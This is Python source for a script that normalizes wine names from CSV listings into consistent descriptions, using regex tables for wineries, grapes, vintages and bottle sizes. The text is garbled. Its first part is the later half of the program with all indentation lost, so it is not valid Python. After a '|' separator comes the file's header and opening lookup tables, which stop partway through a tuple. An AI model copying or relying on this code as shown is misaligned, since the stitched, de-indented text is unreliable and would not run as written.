compile('\\b21\\s*YE?A?R\\b', re.IGNORECASE)), ('30', re.compile(
'\\b30\\s*YE?A?R\\b', re.IGNORECASE))]}
wineAbbrLookup = {'120-80': '\\bOne\\s+Twenty\\s+Over\\s+Eighty\\b',
'3Amigos': '\\bThree\\s+Amigos\\b', '3Palms': '\\bThree\\s+Palms\\b',
'3Sister': '\\bThree\\s+Sisters?\\b', '4Barrell':
'\\b4[\\-\\s]Barrels?\\b', 'Alex': '\\bAlexander\\b', 'And':
'\\bAnderson\\b', 'Car': '\\bCarneros\\b', 'Carries': '\\bCarrie', 'CC':
'\\bC\\.?C\\.?\\s+Ranch\\b', 'Clone4': '\\bClone\\s+4\\b', 'Clone6':
'\\bClone\\s+6\\b', 'Crossbarn': '\\bCross\\s+Barn\\b', 'Donna':
'\\bDonna', 'Est': '\\bEstate\\b', 'Estate': '\\bEst\\b', 'Gap':
'\\bGap|\\s%27Gap', 'Gary': '\\bGary', 'Julia': '\\bJulia', 'Knights':
'\\bKnight', 'KistlerVnyd': '\\bKistler (Vineyard|VYD|EST)\\b', 'LP':
'\\bLes Pierres\\b', 'Lyn': '\\bLyndenhur?st\\b', 'Mont':
'\\bMonterey\\b', 'Mt': '\\bMount\\b|\\bMt\\.\\b', 'Napa/Son':
'\\bNapa.*Son', 'Oak': '\\bOakville\\b', 'One-Pt-5':
'\\bOne\\s+Point\\s+Five\\b', 'Pomm': '\\bPommeraie\\b', 'Priv':
'\\bPrivate\\b', 'RR': '\\bRussian\\s+Rivers?\\b|RRV', 'RRR':
'\\bRussian\\s+Rivers?\\b|RRV', 'Res':
'\\bReserve\\b|\\bRsv\\b|\\bResrv\\b|\\bReserv\\b|\\bReserve$', 'Rose':
'\\bRosé|\\bROS&EACUTE;|\\bRos%E9', 'Ruth': '\\bRutherford\\b',
'Sandy': '\\bSandy', 'Samanthas': '\\bSamantha', 'SC':
'\\bSanta\\s+Cruz\\b', 'SLD': '\\bStag.*Leap\\b', 'SLH':
'\\bSanta\\s+Lucia\\b', 'SMV': '\\bSanta\\s+Maria|\\bS\\s+Maria', 'SRH':
'\\bSTA\\.?|\\bSANTA\\s+Rita\\b|\\bSTA\\sRITA\\sHILLS|\\bS\\s+RITA\\b',
'SS': '\\bSpecial\\s+\\Selection\\b', 'Stage': '\\bStagecoach\\b',
'Son': '\\bSonoma\\b', 'SYV': '\\bSanta\\s+Ynez\\s+Valley\\b', 'TD9':
'\\bTD\\s+9\\b|\\bTD-9\\b', 'Terraces': '\\bTerrace', 'TheCutrer':
'\\bThe Cutrer\\b|nnay Cutrer\\b', 'Tok':
'\\bTo[\\s\\-]?Kolan|\\bTo[\\s\\-]?Kalon', 'Turn4': '\\bTurn\\s+4\\b',
'Vernas': '\\bVerna', 'Vine': '\\bVines\\b', 'Yount':
'\\bYountville\\b', 'ZThree': '\\bZ.*\\bThree\\b', 'ZCuvee':
'\\bZ.*\\bCuvee\\b|\\bCuvee Z\\b', 'Agustina': '\\bAugustina\\b',
'Durell': '\\bDurrell\\b', 'Benchland': '\\bBenchlands\\b', 'Pritchard':
'\\bPitchard\\b'}
reShipsAs = re.compile('\\(ships?\\s', re.IGNORECASE)
defaultorderlist = [['Tok'], ['Oak'], ['Res'], ['RR'], ['Landslide'], [
'Yount'], ['RRR'], ['Son'], ['Ruth'], ['Napa'], ['Helena'], ['SRH'], [
'SLH'], ['SMV'], ['SLD'], ['Paso'], ['Alex'], ['Single'], ['Estate']]
def globalVariableCheck(debug=False):
for liquor in liquorLookup:
if liquor in noGrapeLookup:
print(
'WARNING:liquorLookup regexs will never execute - they are in noGrapeLookup:'
, liquor)
if liquor in ignoreGrapeLookup:
print(
'WARNING:liquorLookup regexs will never execute - they are in ignoreGrapeLookup:'
, liquor)
for winery in ignoreGrapeLookup:
if winery in noGrapeLookup:
print(
'WARNING:ignoreGrapeLookup regexs will never execute - they are in noGrapeLookup:'
, winery)
def setOptionDictMasterFldValues(optiondict, debug=False):
for fld in ('fldWine', 'fldWineDescr'):
if not optiondict[fld + 'Master']:
optiondict[fld + 'Master'] = optiondict[fld]
def wineLookupByName(nameLookup, lookupStr, other, msg, wineAbbrLookup=None,
debug=False):
funcname = 'wineLookupByName:' + msg + ':'
if debug:
print(funcname + 'nameLookup:', nameLookup)
if nameLookup is None:
if debug:
print(funcname + 'match: value is none - continue on')
return ''
for name in nameLookup:
if debug:
print(funcname + 'match-name:', name)
if name is None:
if debug:
print(funcname +
'name-matched: value is none - continue on:pass back blank'
)
return ''
reName = re.compile('\\b' + name + '\\b', re.IGNORECASE)
if reName.search(lookupStr):
if debug:
print(funcname + 'name-MATCHED:', name)
for val in other:
if reName.search(val):
other.remove(val)
if debug:
print(funcname + 'name-remove-from-other:', val)
return name
if wineAbbrLookup and name in wineAbbrLookup:
reName = re.compile(wineAbbrLookup[name], re.IGNORECASE)
if debug:
print(funcname + 'Abbr-match-name:', name)
if reName.search(lookupStr):
if debug:
print(funcname + 'Abbr-name-MATCHED:', wineAbbrLookup[name]
)
for val in other:
if reName.search(val):
other.remove(val)
if debug:
print(funcname + 'name-remove-from-other:', val)
return name
if debug:
print(funcname + 'name match not found:set to blank')
return None
def findQualifier(wine, debug=False):
for val, reSearch in reQualLookup:
if reSearch.search(wine):
if debug:
print('findQualifier:matched-returning:', val)
return val
if debug:
print('findQualifier:no-match-returning:', None)
return None
def findWinery(rec, lastWinery, lastReWinery, fldWine, debug=False):
if lastWinery:
if debug:
try:
print('fw:new winery:', rec[fldWine])
except Exception as e:
print('debug error8-continuing:', str(e))
print('rec[fldWine]:type:', type(rec[fldWine]))
print('fw:checking if this is lastWinery:', lastWinery)
if lastReWinery.search(rec[fldWine]):
if debug:
print('fw:this matches the last winery')
return lastWinery, lastReWinery
elif debug:
print('fw:not last winery')
for winery, reWinery in wineryLookup:
if debug:
print('fw:not lastWinery-checking winery:', winery)
if fldWine not in rec:
print('not a column in this record fldWine:', fldWine)
print('rec:', rec)
if reWinery.search(rec[fldWine]):
if debug:
print('fw:winery match found:', winery)
return winery, reWinery
return None, None
def findLiquor(rec, winery, fldWine, debug=False):
for liquor, reLiquor in liquorLookup[winery]:
if debug:
print('fl:checking liquor:', liquor)
if reLiquor.search(rec[fldWine]):
if debug:
print('fl:liquor match found:', liquor)
return liquor, reLiquor
return None, None
def findGrapeByRegex(rec, fldWine, debug=False):
for grape, reGrape in grapeLookup:
if debug:
print('fgbr:grape:', grape)
if grape is not None and reGrape.search(rec[fldWine]):
if debug:
print('fgbr:grape match found:', grape)
return grape, reGrape
return None, None
def findStrInRecReturnOther(rec, fldWineDescr, findStr, debug=False):
matchLoc = rec[fldWineDescr].find(findStr)
if matchLoc > -1:
other = rec[fldWineDescr][matchLoc + len(findStr) + 1:].split()
if debug:
print('fsirro:findStr matched:', findStr)
if debug:
print('fsirro:findStr other:', other)
return findStr, other
if debug:
print('fsirro:findStr did not match using:', findStr)
return None, []
def findGrapeByStr(rec, fldWineDescr, debug=False):
for grape, reGrape in grapeLookup:
if debug:
print('fg:grape:', grape)
grape, other = findStrInRecReturnOther(rec, fldWineDescr, grape,
debug=debug)
if grape:
return grape, other
return None, []
def findVintage(rec, fldWine, debug=False):
for reVintage in vintageLookup:
m = reVintage.search(rec[fldWine])
if m:
if m.group(1):
vintage = m.group(1)
if debug:
print('fv:vintage-match:', reVintage, ':group1')
elif m.group(2):
vintage = m.group(2)
if debug:
print('fv:vintage-match:', reVintage, ':group2')
elif m.group(3):
vintage = m.group(3)
if debug:
print('fv:vintage-match:', reVintage, ':group3')
else:
vintage = m.group(4)
if debug:
print('fv:vintage-match:', reVintage, ':group4')
return vintage
return None
def buildWineryGrapeLookup(wines, fldWineDescr='winedescr', fldWine='wine',
debug=False):
wgLookup = {}
lastWinery = None
lastReWinery = None
for rec in wines:
if debug:
print('bwgl:new rec:', rec[fldWineDescr])
if not fldWineDescr in rec:
print('creating-field:', fldWineDescr)
rec[fldWineDescr] = ''
winery = grape = wine = liquor = None
other = []
lastWinery, lastReWinery = winery, reWinery = findWinery(rec,
lastWinery, lastReWinery, fldWine, debug=debug)
if not winery:
if debug:
print('bwgl:did not find winery-skipping:', rec[fldWine])
continue
if winery in ignoreGrapeLookup:
wine = ''
if debug:
print('bwgl:wine check ignoreGrapeLookup on winery:', winery)
elif winery in noGrapeLookup:
if debug:
print('bwgl:wine check noGrapeLookup on winery:', winery)
wine = wineLookupByName(noGrapeLookup[winery], rec[fldWineDescr
], [], 'noGrapeLookup', debug=debug)
if False and wine == '':
if debug:
print('bwgl:nograpelookup:no-match:set wine to None')
wine = None
elif winery in liquorLookup:
if debug:
print('bwgl:liquor check on winery:', winery)
liquor, reLiquor = findLiquor(rec, winery, fldWine, debug=debug)
if liquor is not None:
wine = liquor
if debug:
print('bwgl:liquor found and put in wine:', wine)
if wine is None:
if debug:
print('bwgl:grape check because wine is None')
grape, other = findGrapeByStr(rec, fldWineDescr)
if debug:
print('bwgl:grape:', grape, ':other:', other)
elif debug:
print('bwgl:grape check skipped - we have a wine')
if wine is None and grape is None:
if debug:
print('bwgl:record skipped - no grape or wine defined')
continue
if grape is None:
if debug:
print('bwgl:build other from winery')
wineryFind, other = findStrInRecReturnOther(rec, fldWineDescr,
winery, debug=debug)
if 'case' in other:
other.remove('case')
if debug:
print('bwgl:remove case from other')
if other:
if debug:
print('bwgl:looking at other for quals, bottlesize and vintage'
)
if not other[-1].isdigit():
for qual, reQual in reQualLookup:
if qual == other[-1]:
if debug:
print('bwgl:remove qualifier from other:', qual)
del other[-1]
break
if other and not other[-1].isdigit():
for size, reSize in sizeLookup:
if size == other[-1]:
if debug:
print('bwgl:remove bottlesize from other:', size)
del other[-1]
break
if other and other[-1].isdigit():
if winery in ignoreGrapeLookup and ignoreGrapeLookup[winery
] and other[-1] in ignoreGrapeLookup[winery]:
if debug:
print(
'bwgl:value is in ignoreLookupGrape - keeping it:',
other[-1])
else:
if debug:
print('bwgl:remove vintage from other:', other[-1])
del other[-1]
if wine and wine in other:
other.remove(wine)
if debug:
print('bwgl:remove wine from other:', wine)
if debug:
try:
print('bwgl:Final-Build:', winery, ':', grape, ':', wine,
':', liquor, ':', other, ':', rec[fldWineDescr], ':',
rec[fldWine])
except Exception as e:
print('debug error2-continuing:', str(e))
print('fldWine:', fldWine)
if grape is None and wine is not None:
grape = wine
if debug:
print('bwgl:set-grape-to-wine:', grape)
if debug:
print('bwgl:create wgLookup for winery:', winery, ':grape:', grape)
if winery not in wgLookup:
wgLookup[winery] = {grape: []}
elif grape not in wgLookup[winery]:
wgLookup[winery][grape] = []
if other and other not in wgLookup[winery][grape]:
wgLookup[winery][grape].append(other)
if debug:
print('bwgl:appending to wgLookup:other:', other)
if debug:
print('bwgl:complete-read-of-master-file:sort wgLookup')
for winery in wgLookup:
for grape in wgLookup[winery]:
wgLookup[winery][grape] = sorted(wgLookup[winery][grape], key=
len, reverse=True)
if debug:
print('\n' * 5)
print('START WGLOOKUP DUMPED')
print('#' * 80)
if ppFlag:
pp.pprint(wgLookup)
else:
print('bwgl:final-wgLookup:\n', wgLookup)
print('#' * 80)
return wgLookup
def findAddAttribWgLookup(rec, winery, value, fldWine, AbbrLookup=[],
defaultorderlist=None, valueDescr='', debug=False):
singlematch = []
if debug:
try:
print('faawl:value:', valueDescr, ':match-wgLookup:', rec[
fldWine], ':', wgLookup[winery][value])
except Exception as e:
print('debug error7-continuing:', str(e))
print('fldWine:', fldWine)
for valuematchset in wgLookup[winery][value]:
if debug:
print('faawl:testing valuematchset:', valuematchset, ':length:',
len(valuematchset))
allmatch = True
for valuematch in valuematchset:
reMatch1 = re.compile('\\b' + valuematch + '\\b', re.IGNORECASE)
reMatch2 = re.compile('\\s' + valuematch + '\\s', re.IGNORECASE)
m1 = reMatch1.search(rec[fldWine])
m2 = reMatch2.search(rec[fldWine])
if m1 or m2:
allmatch = True and allmatch
elif valuematch in AbbrLookup:
if debug:
print('faawl:valuematch-abbr:', valuematch, ':',
wineAbbrLookup[valuematch])
reMatch = re.compile(wineAbbrLookup[valuematch], re.IGNORECASE)
allmatch = reMatch.search(rec[fldWine]) and allmatch
else:
allmatch = False and allmatch
if debug:
print('faawl:valuematch:', valuematch, ':allmatch:', allmatch)
if allmatch:
if debug:
print('faawl:value matched:', valuematchset)
if len(valuematchset) == 1:
if debug:
print('faawl:single-valuematch-set-added-to-singlematch:',
valuematchset)
singlematch.append(valuematchset)
else:
if debug:
print('faawl:multivalue-valuematch-set-found:done')
return valuematchset
if not singlematch:
if debug:
print('faawl:exit with singlematch NOT populated return blank')
return []
if debug:
print('faawl:exit with singlematch populated:', singlematch)
if len(singlematch) == 1 or not defaultorderlist:
if debug:
print('faawl:return first entry in singlematch:', singlematch[0])
return singlematch[0]
defaultorder = defaultorderlist[:]
if debug:
print('faawl:multiple single match value-singlematch:', singlematch)
for val in singlematch[::-1]:
if val not in defaultorder:
defaultorder.insert(0, val)
if winery == 'Mondavi' and ['Tok'] in singlematch:
if debug:
print('faawl:Change from:', valuematchset, ':to Tok for mondavi')
return ['Tok']
for val in defaultorder:
if val in singlematch:
if debug:
print('faawl:selected-singlematch-value:', val)
return val
if debug:
print('faawl:valuematchset-empty')
return []
def setWineryDescrFromWineryGrapeLookup(wgLookup, wines, fldWineDescr=
'winedescr', fldWine='wine', fldWineDescrNew='winedescrnew',
fldWineDescrMatch=False, debug=False):
if debug:
print('\n' * 10,
'START WINEDESCR SETTING HERE ---------------------------------------------'
)
for rec in wines:
(winery) = (grape) = (wine) = (vintage) = (case) = (size) = (liquor
) = (nongrape) = (qual) = None
winematchset = grapematchset = []
if debug:
try:
print('setWinery:fldWine:', rec[fldWine])
except Exception as e:
print('debug error2-continuing:', str(e))
print('fldWine:', fldWine)
if fldWineDescrNew not in rec:
rec[fldWineDescrNew] = rec[fldWineDescr]
winery, reWinery = findWinery(rec, None, None, fldWine, debug=debug)
if winery is None:
if debug:
print('setWinery:winery not found-next record:' + rec[fldWine])
continue
elif winery not in wgLookup:
if debug:
print('setWinery:winery not in wgLookup:', winery)
continue
grape, reGrape = findGrapeByRegex(rec, fldWine, debug=debug)
if debug:
print('setWinery:grape found:', grape)
if winery in ignoreGrapeLookup:
if debug:
print(
'setWinery:winery-match-ignoreGrape:clear-wine:set-grape-to-None:set-nongrape-True:winery:'
, winery)
wine = ''
grape = None
nongrape = True
if winery in noGrapeLookup:
if debug:
print('setWinery:noGrapeLookup wine check:', winery)
wine = wineLookupByName(noGrapeLookup[winery], rec[fldWine], [],
'noGrapeLookup', wineAbbrLookup, debug=debug)
if debug:
print('setWinery:nogrape check:wine:', wine)
if wine == '':
if debug:
print(
'setWinery:noGrapeLookup:matched:None::clear grape:set nongrape to True'
)
grape = None
wine = ''
nongrape = True
elif wine:
grape = None
if debug:
print(
'setWinery:nograpeLookup:wine found - clear grape field'
)
if wine is None and winery in liquorLookup:
if debug:
print('setWinery:liqourLookup:', winery)
liquor, reLiquor = findLiquor(rec, winery, fldWine, debug=debug)
if liquor is not None:
wine = liquor
if debug:
print('setWinery:liquorLookup-match:', liquor)
if not grape and not nongrape and not wine and liquor is None:
if debug:
print('setWinery:did not find grape-skipping record:', rec[
fldWineDescr])
continue
if debug:
print('setWinery:pre-vintage found values for wine/liquor:',
wine, ':grape:', grape)
vintage = findVintage(rec, fldWine, debug=debug)
if debug:
print('setWinery:vintage:', vintage)
if reCase.search(rec[fldWine]):
case = 'case'
for size, reSize in sizeLookup:
if debug:
print('setWinery:sizeLookup:', size)
if reSize.search(rec[fldWine]) and not reShipsAs.search(rec[
fldWine]):
if debug:
print('setWinery:sizeLookup:matched:', reSize)
break
else:
size = None
if debug:
print('setWinery:sizeLookup:None-found')
qual = findQualifier(rec[fldWine], debug=debug)
if debug:
try:
print('setWinery:FinalAttributes:', winery, ':', grape, ':',
wine, ':', liquor, ':', vintage, ':', case, ':', size,
':', qual, ':', rec[fldWine])
except Exception as e:
print('debug error5-continuing:', str(e))
print('fldWine:', fldWine)
if liquor is not None:
if debug:
print(
'setWinery:liquor flag set - no additional data needs to be collected'
)
elif wine is not None:
if debug:
print(
'setWinery:wine is not None - do additional lookups:wine:',
wine)
if wine in wgLookup[winery] and wgLookup[winery][wine]:
if debug:
print('setWinery:lookup winematchset')
winematchset = findAddAttribWgLookup(rec, winery, wine,
fldWine, wineAbbrLookup, None, valueDescr='wine', debug
=debug)
else:
print('setWinery:unable to perform wgLookup on winery:',
winery, ':wine:', wine, ':rec-wine:', rec[fldWine])
if debug:
try:
print('wgLookup[winery]:', wgLookup[winery])
except Exception as e:
print('debug error3-continuing:', str(e))
print('winery:', winery)
if debug:
print('setWinery:winematchset:', winematchset)
elif grape is not None:
if debug:
print('setWinery:grape is not None - do additional lookups:',
grape)
if grape in wgLookup[winery] and wgLookup[winery][grape]:
grapematchset = findAddAttribWgLookup(rec, winery, grape,
fldWine, wineAbbrLookup, defaultorderlist, valueDescr=
'grape', debug=debug)
elif grape in wgLookup[winery]:
if debug:
print(
'setWinery:grape match: matching record set is blank - no action required'
)
else:
print('setWinery:grape NONMATCH:', rec[fldWine])
if debug:
print('setWinery:liquor:', liquor, ':wine:', wine,
':grape:', grape, ':wgLookup[winery]:', wgLookup[
winery])
if debug:
print('setWinery:grapematchset:', grapematchset)
if vintage:
newVintageLookupWine = rec[fldWine]
for matchvalue in winematchset:
if vintage in matchvalue:
newVintageLookupWine = newVintageLookupWine.replace(
matchvalue, '')
if debug:
print(
'setWinery:2nd-vintage:winematchset:wine-name-removal:'
, matchvalue)
for matchvalue in grapematchset:
if vintage in matchvalue:
newVintageLookupWine = newVintageLookupWine.replace(
matchvalue, '')
if debug:
print(
'setWinery:2nd-vintage:grapematchset:wine-name-removal:'
, matchvalue)
if newVintageLookupWine != rec[fldWine]:
if debug:
print('setWinery:2nd-vintage:newVintageLookupWine:',
newVintageLookupWine)
newVintage = findVintage({fldWine: newVintageLookupWine},
fldWine, debug=debug)
if debug:
print('setWinery:2nd-vintage:newVintage:', newVintage)
vintage = newVintage
wineDescr = ''
if winery.startswith('z'):
vintage = None
if debug:
print('setWinery:winery starts with z: clear vintage')
if winematchset and ' '.join(winematchset) in wine:
if debug:
print('setWinery:clearing-winematchset:', winematchset,
':is-in-wine:', wine)
winematchset = []
if grapematchset and ' '.join(grapematchset) in grape:
if not (len(grapematchset) == 1 and len(grapematchset[0]) == 1):
if debug:
print('setWinery:clearing-grapematchset:',
grapematchset, ':is-in-grape:', grape)
grapematchset = []
if grapematchset and size and size in ' '.join(grapematchset):
size = ''
if winematchset and size and size in ' '.join(winematchset):
size = ''
if debug:
print('setWinery:vallist1:', [winery, grape, wine] +
grapematchset + winematchset + [vintage, size, qual, case])
print('setWinery:vallist2:', [winery, grape, wine, *
grapematchset, *winematchset, vintage, size, qual, case])
wdList = []
for val in ([winery, grape, wine] + grapematchset + winematchset +
[vintage, size, qual, case]):
if val:
wdList.append(val)
wineDescr = ' '.join(wdList)
if False:
if debug:
print('setWinery:wdList:', wdList)
if debug:
print('setWinery:wineDescr:', wineDescr)
if debug:
try:
print(':'.join(['setWinery:wineDescrList', wineDescr, rec[
fldWineDescr], str(wineDescr == rec[fldWineDescr]), rec
[fldWine]]))
except Exception as e:
print('debug error6-continuing:', str(e))
print('fldWine:', fldWine)
rec[fldWineDescrNew] = wineDescr
if fldWineDescrMatch:
rec[fldWineDescrMatch] = rec[fldWineDescr] == rec[fldWineDescrNew]
def setDigitFld2Value(wines, fld, value, debug=False):
for rec in wines:
if rec[fld].isdigit():
rec[fld] = value
def updateFileOptionDictCheck(optiondict, wines, header, debug=False):
if optiondict['fldWineDescr'] not in wines[0]:
if debug:
print('updateFileOptionDictCheck:fldWineDescr NOT in file read in:'
, optiondict['fldWineDescr'])
if 'cnt' in wines[0]:
print('setting values fldWineDescr and fldWineDescrNew to: cnt')
optiondict['fldWineDescr'] = optiondict['fldWineDescrNew'] = 'cnt'
elif 'winedescr' in wines[0]:
print(
'setting values fldWineDescr to winedescr and fldWineDescrNew to winedescrnew'
)
optiondict['fldWineDescr'] = 'winedescr'
optiondict['fldWineDescrNew'] = 'winedescrnew'
else:
print('could not find fldWineDescr in wines[0]-aborting:',
optiondict['fldWineDescr'], '\nwines[0]:', wines[0])
error = wines[0][optiondict['fldWineDescr']]
if False and optiondict['fldWineDescr'] == 'winedescr':
if not optiondict['fldWineDescrMatch']:
optiondict['fldWineDescrMatch'] = 'same'
print('setting value fldWineDescrMatch to: same')
if optiondict['csvfile_update_in'] == optiondict['csvfile_update_out']:
file_path, base_filename, file_ext = kvutil.filename_split(optiondict
['csvfile_update_in'])
backupfile = kvutil.filename_proper(base_filename + optiondict[
'backupfile_ext'], file_path)
print('copying ', optiondict['csvfile_update_in'], ' to ', backupfile)
shutil.copyfile(optiondict['csvfile_update_in'], backupfile)
if optiondict['fldWineDescrNew'] == 'cnt':
optiondict['csvdictkeys'] = ['cnt', 'date', 'search', 'store',
'wine', 'winesrt']
elif optiondict['fldWineDescrMatch']:
optiondict['csvdictkeys'] = [optiondict['fldWineDescr'], optiondict
['fldWineDescrNew'], optiondict['fldWineDescrMatch'], *header]
else:
optiondict['csvdictkeys'] = [optiondict['fldWineDescrNew']] + header[1:
]
print('updateFileOptionDictCheck:set csvdictkeys to:', optiondict[
'csvdictkeys'])
if __name__ == '__main__':
optiondict = kvutil.kv_parse_command_line(optiondictconfig, debug=False)
ppFlag = optiondict['pprint']
setOptionDictMasterFldValues(optiondict, debug=False)
if optiondict['setup_check']:
print('Running global variable check')
globalVariableCheck(debug=optiondict['debug'])
sys.exit()
print('reading in master file:', optiondict['csvfile_master_in'])
wines, header = kvcsv.readcsv2list_with_header(optiondict[
'csvfile_master_in'], headerlc=True)
wgLookup = buildWineryGrapeLookup(wines, optiondict[
'fldWineDescrMaster'], optiondict['fldWineMaster'], debug=
optiondict['debug'])
if optiondict['csvfile_master_in'] != optiondict['csvfile_update_in']:
print('reading in update file:', optiondict['csvfile_update_in'])
wines, header = kvcsv.readcsv2list_with_header(optiondict[
'csvfile_update_in'], headerlc=True)
if not wines:
print(
'wineset.py - no records read in - no work to be done - exitting'
)
sys.exit()
updateFileOptionDictCheck(optiondict, wines, header, debug=optiondict[
'debug'])
setWineryDescrFromWineryGrapeLookup(wgLookup, wines, optiondict[
'fldWineDescr'], optiondict['fldWine'], optiondict[
'fldWineDescrNew'], optiondict['fldWineDescrMatch'], debug=
optiondict['debug'])
if optiondict['defaultnew'] is not None:
print('Setting ', optiondict['fldWineDescrNew'], ' to ', optiondict
['defaultnew'], 'if not set')
setDigitFld2Value(wines, optiondict['fldWineDescrNew'], optiondict[
'defaultnew'], debug=optiondict['debug'])
kvcsv.writelist2csv(optiondict['csvfile_update_out'], wines, optiondict
['csvdictkeys'])
print('Saved results to:', optiondict['csvfile_update_out'])
| '''
@author: Ken Venner
@contact: [email protected]
@version: 1.13
Read in a file of wine names and create consistent wine descriptions
from these names.
'''
import kvutil
import kvcsv
import re
import sys
import shutil
# may comment out in the future
import pprint
pp = pprint.PrettyPrinter(indent=4)
ppFlag = False
# application variables
optiondictconfig = {
'AppVersion' : {
'value' : '1.13',
'description' : 'defines the version number for the app',
},
'debug' : {
'value' : False,
'type' : 'bool',
'description' : 'defines if we are running in debug mode',
},
'verbose' : {
'value' : 1,
'type' : 'int',
'description' : 'defines the display level for print messages',
},
'setup_check' : {
'value' : False,
'type' : 'bool',
'description' : 'defines if we checking out setup',
},
'pprint' : {
'value' : False,
'type' : 'bool',
'description' : 'defines if we output with pretty print when debugging',
},
'csvfile_master_in' : {
'value' : 'wine_xref.csv',
'description' : 'defines the name of the master data input file',
},
'csvfile_update_in' : {
'value' : 'wineref.csv',
'description' : 'defines the name of the input file to updated',
},
'csvfile_update_out' : {
'value' : 'wineref2.csv',
'description' : 'defines the name of the updated output file',
},
'fldWine' : {
'value' : 'wine',
'description' : 'defines the name of the field that holds the Wine ',
},
'fldWineDescr' : {
'value' : 'winedescr',
'description' : 'defines the name of the field holding the wine description',
},
'fldWineDescrNew' : {
'value' : 'winedescrnew',
'description' : 'defines the name of the NEW field holding the new description ',
},
'fldWineDescrMatch' : {
'value' : None,
'description' : 'defines the name of the NEW field holding the results of comparison existing to new description ',
},
'fldWineMaster' : {
'value' : None,
'description' : 'defines the name of the field that holds the Wine when reading the master file ',
},
'fldWineDescrMaster' : {
'value' : None,
'description' : 'defines the name of the field holding the wine description when reading the master file',
},
'backupfile_ext' : {
'value' : '.bak',
'description' : 'defines the extension to use to copy the update input file to if we are replacing it with output',
},
'defaultnew' : {
'value' : None,
'description' : 'defines if we should take field fldWineDescrNew and set to a value if not set',
},
}
### GLOBAL VARIABLES / LOOKUPS ########################################
# regex search for vintage in wine name
vintageLookup = (
re.compile('\d\d\d\d\s+\d\d(\d\d)'), # two years together - get this one over early
re.compile('^\d\d(\d\d)'), # four position start of line
re.compile('\s\d\d(\d\d)$'), # four position end of line
re.compile('\s\d\d(\d\d)\s'), # four position middle of line
re.compile('XX\d\d(\d\d)\s'), # four position middle of line
re.compile('\s\d\d(\d\d)\/'), # four position split
re.compile('\s\'?(\d\d)\'?$|\s\'?(\d\d)\'?\s'), # two position date with optional apostrophe front or back
)
# regex search for case in wine name
reCase = re.compile(r'12\s*X\s*750\s*ML|\bcase\b|12\/750\s*ML',re.IGNORECASE)
# regex to pick up qualifiers from the wine
reQualLookup = (
(None, re.compile(r'\bWithout\s+Gift\b|\bNo\s+Gift', re.IGNORECASE)), # the none gift do them first
('Gift', re.compile(r'\bGift\b', re.IGNORECASE)),
('VAP', re.compile(r'\bVAP\b', re.IGNORECASE)),
('VAP', re.compile(r'\bGlassVAP\b', re.IGNORECASE)),
('Glass', re.compile(r'\bGlass\b', re.IGNORECASE)),
('Glass', re.compile(r'\bGlasses\b', re.IGNORECASE)),
('Etch', re.compile(r'\bEtch\b', re.IGNORECASE)),
('Basket', re.compile(r'\bBasket\b', re.IGNORECASE)),
)
# regex search to define the size of the wine bottle
sizeLookup = (
('1.75L', re.compile(r'\b1\.75\s*Li?|\b1\.75$', re.IGNORECASE)),
('1.5L', re.compile(r'\b1\.5\s*L?\b|\bMagnum\b', re.IGNORECASE)),
('375mL', re.compile(r'Half\s+Bottle|375ml', re.IGNORECASE)),
('200mL', re.compile(r'\b200\s*ML|\(200\s*ML', re.IGNORECASE)),
('50mL', re.compile(r'\b50\s*ML|\(50\s*ML', re.IGNORECASE)),
('500mL', re.compile(r'\b500\s*ML|\(500\s*ML', re.IGNORECASE)),
('3L', re.compile(r'\b3\s*Li?', re.IGNORECASE)),
('6L', re.compile(r'\b6\s*Li?', re.IGNORECASE)),
('9L', re.compile(r'\b9\s*Li?', re.IGNORECASE)),
('1L', re.compile(r'\b1L\b|\b1\s+L$|\b1.0\s*L\b|\b1\s+Liter\b|\bOne\s+Liter\b|\bLITER\b|\b1\s*LTR', re.IGNORECASE)),
)
# regex extract winery names from the wine field
wineryLookup = (
('Alban', re.compile(r'\bAlban\b', re.IGNORECASE)),
('Arrowood', re.compile(r'\bArrowood\b', re.IGNORECASE)),
('Atalon', re.compile(r'\bAtalon\b', re.IGNORECASE)),
('Attune', re.compile(r'\bAttune\b', re.IGNORECASE)),
('Auteur', re.compile(r'\bAuteur\b', re.IGNORECASE)),
('Austin Hope', re.compile(r'\bAustin\s+Hope\b', re.IGNORECASE)),
('Badge', re.compile(r'\bBadge\b', re.IGNORECASE)),
('Balletto', re.compile(r'\bBalletto\b', re.IGNORECASE)),
('Bell', re.compile(r'\bBell\s+Cellar', re.IGNORECASE)),
('BR Cohn', re.compile(r'\bB\.?\s?R\.?\s+Cohn\b', re.IGNORECASE)),
('Bremer', re.compile(r'\bBremer\b', re.IGNORECASE)),
('Brewer-Clifton', re.compile(r'\bBrewer[\s\-]Clifton\b', re.IGNORECASE)),
('BV', re.compile(r'\bBeaulieu\s+V|\bBV\b', re.IGNORECASE)),
('Belle Glos', re.compile(r'\bBelle\s+Glos\b', re.IGNORECASE)),
('Bennett Ln', re.compile(r'\bBennet+\sLane\b', re.IGNORECASE)),
('Benovia', re.compile(r'\bBenovia\b', re.IGNORECASE)),
('Beringer', re.compile(r'\bBeringer\b', re.IGNORECASE)),
('Blackstone', re.compile(r'\bBlackstone\b', re.IGNORECASE)),
('Brancott', re.compile(r'\bBrancott\b', re.IGNORECASE)),
('Cade', re.compile(r'\bCade\b', re.IGNORECASE)),
('Cain Five', re.compile(r'\bCain\s+Five\b|\bCain\s-\sFive\b|\bCain\s5\b|\bCainFive\b', re.IGNORECASE)),
('Cakebread', re.compile(r'\bCakebread\b', re.IGNORECASE)),
('Cardinale', re.compile(r'\bCardinale\b', re.IGNORECASE)),
('Caymus', re.compile(r'\bCaymus\b', re.IGNORECASE)),
('Chappellet', re.compile(r'\bChappellet\b', re.IGNORECASE)),
('Chalk Hill', re.compile(r'\bChalk\s+Hill\b', re.IGNORECASE)),
('Clos Du Bois', re.compile(r'\bClos\s+Du\s+Bois\b', re.IGNORECASE)),
('ClosDuVal', re.compile(r'\bClos\s+du\s+Val\b', re.IGNORECASE)),
('Colgin', re.compile(r'\bColgin\b', re.IGNORECASE)),
('Concha Don Melchor', re.compile(r'\bConcha\s.*Don\s+Melchor\b|Don\s+Melchor\b', re.IGNORECASE)),
('Continuum', re.compile(r'\bContinuum\b', re.IGNORECASE)),
('Corison', re.compile(r'\bCorison\b', re.IGNORECASE)),
('Cristal', re.compile(r'Roederer\s?.*Cristal\b|\bCristal\b.+Brut', re.IGNORECASE)),
('Curran', re.compile(r'\bCurran\b', re.IGNORECASE)),
('Darioush', re.compile(r'\bDarioush\b', re.IGNORECASE)),
('Darioush', re.compile(r'\bCaravan\b', re.IGNORECASE)),
